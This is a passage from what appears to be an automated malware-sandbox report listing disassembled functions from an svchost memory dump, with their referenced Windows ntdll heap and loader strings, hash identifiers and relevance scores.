                                                                                                              • Opcode ID: 4d33d6c232e3d7875335b3563468fcdc79b2f8611cd347dd1d014ca74054d2bc
                                                                                                              • Instruction ID: a3f87d46c712c1f9c140cf059da936dce4581cd4ac145a8efb2d4efa2dda045d
                                                                                                              • Opcode Fuzzy Hash: 4d33d6c232e3d7875335b3563468fcdc79b2f8611cd347dd1d014ca74054d2bc
                                                                                                              • Instruction Fuzzy Hash: C6A1F434A04205DFDB24EF28C84077AFBE5EF45308F1885FAD99A8B642D734E844DB95
                                                                                                              Function 03B6273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • .Local, xrefs: 03B628D8
                                                                                                              • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 03BA21D9, 03BA22B1
                                                                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 03BA22B6
                                                                                                              • SXS: %s() passed the empty activation context, xrefs: 03BA21DE
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                              • API String ID: 0-1239276146
                                                                                                              • Opcode ID: 62b95032385feb7b326d0b1a400ed3720ffaab2c736b160c9abd54c55de71f8b
                                                                                                              • Instruction ID: aa6b0654238806f107b4c6fb3aa39c95a8860f0b759e141aa12de2252677ebd7
                                                                                                              • Opcode Fuzzy Hash: 62b95032385feb7b326d0b1a400ed3720ffaab2c736b160c9abd54c55de71f8b
                                                                                                              • Instruction Fuzzy Hash: 03A18F35D056299BDB24CF64CC84BA9B3B5FF58318F1849F9D848AB292D7349E80CF90
                                                                                                              Function 03B2F626 Relevance: 5.2, Strings: 4, Instructions: 188COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                                                              • API String ID: 0-2586055223
                                                                                                              • Opcode ID: 55014da608e45fd8403059a889a496dbe01e28a41088fe63cdfb84dfdba3ea91
                                                                                                              • Instruction ID: eb9b6bde7d5a4b9e7f1f834d057cfc38a4897b0152a5a4ce886290992071b8a5
                                                                                                              • Opcode Fuzzy Hash: 55014da608e45fd8403059a889a496dbe01e28a41088fe63cdfb84dfdba3ea91
                                                                                                              • Instruction Fuzzy Hash: 85610476204740AFD722EB28C844F6BBBE9EF84718F0805F8F9598B291D734D941CB62
                                                                                                              Function 03BE11A4 Relevance: 5.1, Strings: 4, Instructions: 113COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                                                                              • API String ID: 0-336120773
                                                                                                              • Opcode ID: c7494dabb2049eb3a842557ab289400067e2ec3518fc7ddaf260a1ef06cd4537
                                                                                                              • Instruction ID: db77efddd2699698c09e6cf14bae53ecd94fb1d4529855f9de75a04d8cb2e28f
                                                                                                              • Opcode Fuzzy Hash: c7494dabb2049eb3a842557ab289400067e2ec3518fc7ddaf260a1ef06cd4537
                                                                                                              • Instruction Fuzzy Hash: 55318B35A00210EFD725DB9CCC85F6AB7E8EF0566CF2801E5E415DB2A1DB74E840DA65
                                                                                                              Function 03B29148 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                                                              • API String ID: 0-1391187441
                                                                                                              • Opcode ID: 2ab13376a35e78b2e1acb5bf563ea7c2cc50bd871fcfde942ee5933e371c1e5b
                                                                                                              • Instruction ID: a51237620287604e35eea2211a20cc5797625c35293f0cd05c5e83b0cca07673
                                                                                                              • Opcode Fuzzy Hash: 2ab13376a35e78b2e1acb5bf563ea7c2cc50bd871fcfde942ee5933e371c1e5b
                                                                                                              • Instruction Fuzzy Hash: CA319636A00214EFCB11DB56C885FDEBFB9EF45A28F1441F5E428AB291DB74ED40CA61
                                                                                                              Function 03B429A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • HEAP[%wZ]: , xrefs: 03B43255
                                                                                                              • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 03B4327D
                                                                                                              • HEAP: , xrefs: 03B43264
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                              • API String ID: 0-617086771
                                                                                                              • Opcode ID: fd1c032c8916c29c628e48b0149fe8576288f7560c8289008fae71c5bec78dda
                                                                                                              • Instruction ID: 2f1c04b0f0ce2a1120a1db9aa9381266177acbb41b634f586aa2e35b086156f7
                                                                                                              • Opcode Fuzzy Hash: fd1c032c8916c29c628e48b0149fe8576288f7560c8289008fae71c5bec78dda
                                                                                                              • Instruction Fuzzy Hash: FB92BD74A042499FDB25CF68C4407AEBBF1FF48308F1884E9E899AB391D735A941EF54
                                                                                                              Function 03B41F92 Relevance: 4.3, Strings: 3, Instructions: 563COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                              • API String ID: 0-3178619729
                                                                                                              • Opcode ID: a358ba4934888d322d5dbb8438273701c2ba28faa8587bc88bb4884981ef0103
                                                                                                              • Instruction ID: a2a4d8efc8093937e3d344ca2a8f9abb2101a8a13d73c5f95d1ae7cf2117bcc8
                                                                                                              • Opcode Fuzzy Hash: a358ba4934888d322d5dbb8438273701c2ba28faa8587bc88bb4884981ef0103
                                                                                                              • Instruction Fuzzy Hash: 8822CE706006559FEB26DF28C494B7AFBB5EF06708F1885FAE4598F282D735E881CB50
                                                                                                              Function 03B40770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                              • API String ID: 0-4253913091
                                                                                                              • Opcode ID: 99d699225392be0e813cdc11c97173ad5803c47c8174168417069f99b42a7440
                                                                                                              • Instruction ID: 22fb2a23a446f55a83755e45fe84cb75b2fd546c7bf515ac27947d7c2eb2657b
                                                                                                              • Opcode Fuzzy Hash: 99d699225392be0e813cdc11c97173ad5803c47c8174168417069f99b42a7440
                                                                                                              • Instruction Fuzzy Hash: 99F1AA34A00605DFEB25EF68C980B6AF7B5FB45308F1881FAE5169B381D734E981DB94
                                                                                                              Function 03B31460 Relevance: 4.1, Strings: 3, Instructions: 385COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • HEAP[%wZ]: , xrefs: 03B31712
                                                                                                              • HEAP: , xrefs: 03B31596
                                                                                                              • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 03B31728
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                              • API String ID: 0-3178619729
                                                                                                              • Opcode ID: dd41f8b324aef0063bbeb43d54d57a7c54815ad15ed4b952bcac1752f271eb78
                                                                                                              • Instruction ID: 8ad6b30853b3cdaaeb45a8b8e88abfb6a49232455625a56113e2a261d52f0d1a
                                                                                                              • Opcode Fuzzy Hash: dd41f8b324aef0063bbeb43d54d57a7c54815ad15ed4b952bcac1752f271eb78
                                                                                                              • Instruction Fuzzy Hash: 12E1FF74A042619BDB29EF6CC441B7ABBF9EF46308F1885F9E496CB245E734E840CB50
                                                                                                              Function 03B3B6C0 Relevance: 4.1, Strings: 3, Instructions: 303COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                                                                              • API String ID: 0-1145731471
                                                                                                              • Opcode ID: 3d32f013db8593d17fcdec1bee8f4022b4e7120e17672db02567f975be92c67a
                                                                                                              • Instruction ID: 87d3c485ed817d100cef042d1ea7def039d159acea73d50c03b58fbeab35b0c3
                                                                                                              • Opcode Fuzzy Hash: 3d32f013db8593d17fcdec1bee8f4022b4e7120e17672db02567f975be92c67a
                                                                                                              • Instruction Fuzzy Hash: 86B17A7AA046149BEF25CF69C880BADB7F6EF45318F1985FAE455EB384D730A840CB50
                                                                                                              Function 03BB368C Relevance: 4.0, Strings: 3, Instructions: 292COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                                                                              • API String ID: 0-2391371766
                                                                                                              • Opcode ID: e9ae53573f165133de5a1d03daf44f50e2d7a74ed624168186b31928e5dfdd88
                                                                                                              • Instruction ID: 74a1decedb60f6e3a4e79854c5e6691fd4b3a0555365915f9cd8c24ca334caf4
                                                                                                              • Opcode Fuzzy Hash: e9ae53573f165133de5a1d03daf44f50e2d7a74ed624168186b31928e5dfdd88
                                                                                                              • Instruction Fuzzy Hash: D9B1AE7A604341AFD721EE55C880FABB7F8EB44718F1509B9F9559B250DBB0EC04CB92
                                                                                                              Function 03B56962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $@
                                                                                                              • API String ID: 0-1077428164
                                                                                                              • Opcode ID: 12ffbe55be822b7e523ec172287004cbc33a8aeffaf5a94cd48e240cc866920a
                                                                                                              • Instruction ID: c32f1329de6fa35dfcb3dbf6c80cf5b6b6a929a6e15b5dd2fc90d063fdb37528
                                                                                                              • Opcode Fuzzy Hash: 12ffbe55be822b7e523ec172287004cbc33a8aeffaf5a94cd48e240cc866920a
                                                                                                              • Instruction Fuzzy Hash: FBC24F716083419FEB25CF24C881BABBBE5EF88758F0889BDF98987251D734D805CB52
                                                                                                              Function 03B2A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: FilterFullPath$UseFilter$\??\
                                                                                                              • API String ID: 0-2779062949
                                                                                                              • Opcode ID: 1aedf3cf525fbcb0615d478c94cb61a7c8f8177c74b182c86694b10e215d4804
                                                                                                              • Instruction ID: b5c28464f103566b22b563ac3e047e5873d13cae45ff8ba42f47b809fe0602ee
                                                                                                              • Opcode Fuzzy Hash: 1aedf3cf525fbcb0615d478c94cb61a7c8f8177c74b182c86694b10e215d4804
                                                                                                              • Instruction Fuzzy Hash: 89A15C759016299BDB31EF24CC88BAAFBB8EF44708F1401E9E909AB250D7359E85CF50
                                                                                                              Function 03BC36EE Relevance: 4.0, Strings: 3, Instructions: 236COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                                                                                              • API String ID: 0-318774311
                                                                                                              • Opcode ID: 0ede1cd71de818cfe32e5f8105c1b934dff0bd394704b81ae5e913308c08998f
                                                                                                              • Instruction ID: e26ebde2c93bc0c4420e5419fc2ad7ac82d7b5f7b0584f314b8deb9fe84cc829
                                                                                                              • Opcode Fuzzy Hash: 0ede1cd71de818cfe32e5f8105c1b934dff0bd394704b81ae5e913308c08998f
                                                                                                              • Instruction Fuzzy Hash: D181BD79618380AFD321DB14C844F6AB7E8FF84758F4889BDB9999B390D778D804CB52
                                                                                                              Function 03B6909C Relevance: 3.9, Strings: 3, Instructions: 199COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: %$&$@
                                                                                                              • API String ID: 0-1537733988
                                                                                                              • Opcode ID: a78fa4513ce1efbdd8c2ed4db966b0752cfa11bff13c3f4918450df34786a34e
                                                                                                              • Instruction ID: 5b4a1390090ad1b73586835d01d82ae71cfc33a39fdd53ddde502ac0dd47ef76
                                                                                                              • Opcode Fuzzy Hash: a78fa4513ce1efbdd8c2ed4db966b0752cfa11bff13c3f4918450df34786a34e
                                                                                                              • Instruction Fuzzy Hash: FD71C0746087019FC724DF24C580A2BBBE9FF8571CF1449BEE49A8B252D734D905CB92
                                                                                                              Function 03C0B73C Relevance: 3.9, Strings: 3, Instructions: 180COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 03C0B82A
                                                                                                              • GlobalizationUserSettings, xrefs: 03C0B834
                                                                                                              • TargetNtPath, xrefs: 03C0B82F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                                                                              • API String ID: 0-505981995
                                                                                                              • Opcode ID: 50f709b39ccbdab873a171f0c1e4297712cfd1feae02590af79a3a875811b913
                                                                                                              • Instruction ID: 01724a14e76d6107fdfab28bb01a1e01f194c1a5a2029acb4812bdeef80fadc6
                                                                                                              • Opcode Fuzzy Hash: 50f709b39ccbdab873a171f0c1e4297712cfd1feae02590af79a3a875811b913
                                                                                                              • Instruction Fuzzy Hash: 4E617E76D41269ABDB31DF54DC88BDAB7B8AF14714F0101E5A948EB290CB74DE80CFA0
                                                                                                              Function 03B2F7BA Relevance: 3.9, Strings: 3, Instructions: 167COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • HEAP[%wZ]: , xrefs: 03B8E6A6
                                                                                                              • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 03B8E6C6
                                                                                                              • HEAP: , xrefs: 03B8E6B3
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                                                              • API String ID: 0-1340214556
                                                                                                              • Opcode ID: fdda16da35c8c88deec6ef080483c9449aaf4f232b50c5c0d4159b6120dd0631
                                                                                                              • Instruction ID: bf8c4ec7582da63d71ddc6b8021d8cc6850364d6282b5e7a76310d8b4c5c4e83
                                                                                                              • Opcode Fuzzy Hash: fdda16da35c8c88deec6ef080483c9449aaf4f232b50c5c0d4159b6120dd0631
                                                                                                              • Instruction Fuzzy Hash: D651C335604754EFD722EBA8C884BAAFBF8EF05308F0801F5E9558B692D774E950CB11
                                                                                                              Function 03BDDAAC Relevance: 3.9, Strings: 3, Instructions: 163COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • HEAP[%wZ]: , xrefs: 03BDDC12
                                                                                                              • HEAP: , xrefs: 03BDDC1F
                                                                                                              • Heap block at %p modified at %p past requested size of %Ix, xrefs: 03BDDC32
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                                                                              • API String ID: 0-3815128232
                                                                                                              • Opcode ID: 010dcf27472b77de1bd358a0a07ffb87c0ad339271185b06351fb3ccd460bfd1
                                                                                                              • Instruction ID: 2e0fd0e31cd8e11de5bf934effd70799883c68be2c3fd5aa449291bf4d349c75
                                                                                                              • Opcode Fuzzy Hash: 010dcf27472b77de1bd358a0a07ffb87c0ad339271185b06351fb3ccd460bfd1
                                                                                                              • Instruction Fuzzy Hash: 2C5121352006508EE774DB2AC844772B7E2EF4524CF0888FEE4D6CB685F676E802DB20
                                                                                                              Function 03B6C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 03BA82E8
                                                                                                              • Failed to reallocate the system dirs string !, xrefs: 03BA82D7
                                                                                                              • LdrpInitializePerUserWindowsDirectory, xrefs: 03BA82DE
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                              • API String ID: 0-1783798831
                                                                                                              • Opcode ID: b76d12a4ce8674d3544b4f30e678680ca4af9334fa1ab224d935d5b692e92c28
                                                                                                              • Instruction ID: fdc7bea60079ae282ca88e13655ebe494b99023e80756c386b5c9526f3bad121
                                                                                                              • Opcode Fuzzy Hash: b76d12a4ce8674d3544b4f30e678680ca4af9334fa1ab224d935d5b692e92c28
                                                                                                              • Instruction Fuzzy Hash: 124104B5515704ABC720FB68D840B6B7BE8EF44758F0449BAF988DB251EB74EC10CBA1
                                                                                                              Function 03B616CF Relevance: 3.9, Strings: 3, Instructions: 127COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 03BA1B39
                                                                                                              • LdrpAllocateTls, xrefs: 03BA1B40
                                                                                                              • minkernel\ntdll\ldrtls.c, xrefs: 03BA1B4A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                                                                              • API String ID: 0-4274184382
                                                                                                              • Opcode ID: 17137a644a5dfc892d8957eda0016c16a78e00b6613f1ddc80ea221468708d1b
                                                                                                              • Instruction ID: d90fc68869b92db5da2160de3fd093ad2d965d20e7ab00bea8891af02134ea25
                                                                                                              • Opcode Fuzzy Hash: 17137a644a5dfc892d8957eda0016c16a78e00b6613f1ddc80ea221468708d1b
                                                                                                              • Instruction Fuzzy Hash: 9E4170B9A00B04AFCB15DFACC841BAEFBF5FF49718F1481A9E416A7251D774A900CB90
                                                                                                              Function 03BEC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • @, xrefs: 03BEC1F1
                                                                                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 03BEC1C5
                                                                                                              • PreferredUILanguages, xrefs: 03BEC212
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                              • API String ID: 0-2968386058
                                                                                                              • Opcode ID: fb80e09286bcaa5bad6bcc38fc062bc48a8aa63de587c3e140bcf2403063bbc7
                                                                                                              • Instruction ID: cf4dab442280d06b12c26242e33ae67e48d0e5af490a83b867ebcd3f68e79bd2
                                                                                                              • Opcode Fuzzy Hash: fb80e09286bcaa5bad6bcc38fc062bc48a8aa63de587c3e140bcf2403063bbc7
                                                                                                              • Instruction Fuzzy Hash: F8416175E00219EBDF11DFD8C845FEEBBB8EB04708F1441BAE515B7290D7749A448B54
                                                                                                              Function 03BC4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                              • API String ID: 0-1373925480
                                                                                                              • Opcode ID: 3ffa62f641a345d916126fb03ee1de9767e49f72552778be8f108790e3d472c2
                                                                                                              • Instruction ID: 235688c85f3b097e9b56bc0a246cbe83059be7448526b8b8217d6ec1c5236d8b
                                                                                                              • Opcode Fuzzy Hash: 3ffa62f641a345d916126fb03ee1de9767e49f72552778be8f108790e3d472c2
                                                                                                              • Instruction Fuzzy Hash: 8E41E475A203988BDB32DB96C851BADBBB8EF55348F1804FDD851EF781DA748A01CB11
                                                                                                              Function 03BB4755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 03BB4899
                                                                                                              • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 03BB4888
                                                                                                              • LdrpCheckRedirection, xrefs: 03BB488F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                              • API String ID: 0-3154609507
                                                                                                              • Opcode ID: 51ba4268c3af9478f3866e67b5bee6f4fbb24fb8ff69fbb34c08f9a8bf1395c1
                                                                                                              • Instruction ID: a728a701124493b6a7d97604b8fec58a71092031962651f1f89a02547967b815
                                                                                                              • Opcode Fuzzy Hash: 51ba4268c3af9478f3866e67b5bee6f4fbb24fb8ff69fbb34c08f9a8bf1395c1
                                                                                                              • Instruction Fuzzy Hash: E541A4726047509FCB21CE5AD840AB6BBF4FB49A58F0905F9EC58DB252DBB0D800CB91
                                                                                                              Function 03B633A0 Relevance: 3.9, Strings: 3, Instructions: 111COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • RtlCreateActivationContext, xrefs: 03BA29F9
                                                                                                              • Actx , xrefs: 03B633AC
                                                                                                              • SXS: %s() passed the empty activation context data, xrefs: 03BA29FE
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                                                                              • API String ID: 0-859632880
                                                                                                              • Opcode ID: eaab879129e3d70680e27e35531affbc07e15cd117495b7528a4123f54347468
                                                                                                              • Instruction ID: e36e767d3f52ef3238c3dc8e69abf5d5935ccfb4853f948bcb97eb25a87c7d37
                                                                                                              • Opcode Fuzzy Hash: eaab879129e3d70680e27e35531affbc07e15cd117495b7528a4123f54347468
                                                                                                              • Instruction Fuzzy Hash: A83123366007059FDB26DE58D8D0BA6B7E4EB84718F0984B9E9099F2A6CB74D841CB90
                                                                                                              Function 03B61607 Relevance: 3.8, Strings: 3, Instructions: 98COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • DLL "%wZ" has TLS information at %p, xrefs: 03BA1A40
                                                                                                              • LdrpInitializeTls, xrefs: 03BA1A47
                                                                                                              • minkernel\ntdll\ldrtls.c, xrefs: 03BA1A51
                                                                                                              Memory Dump Source
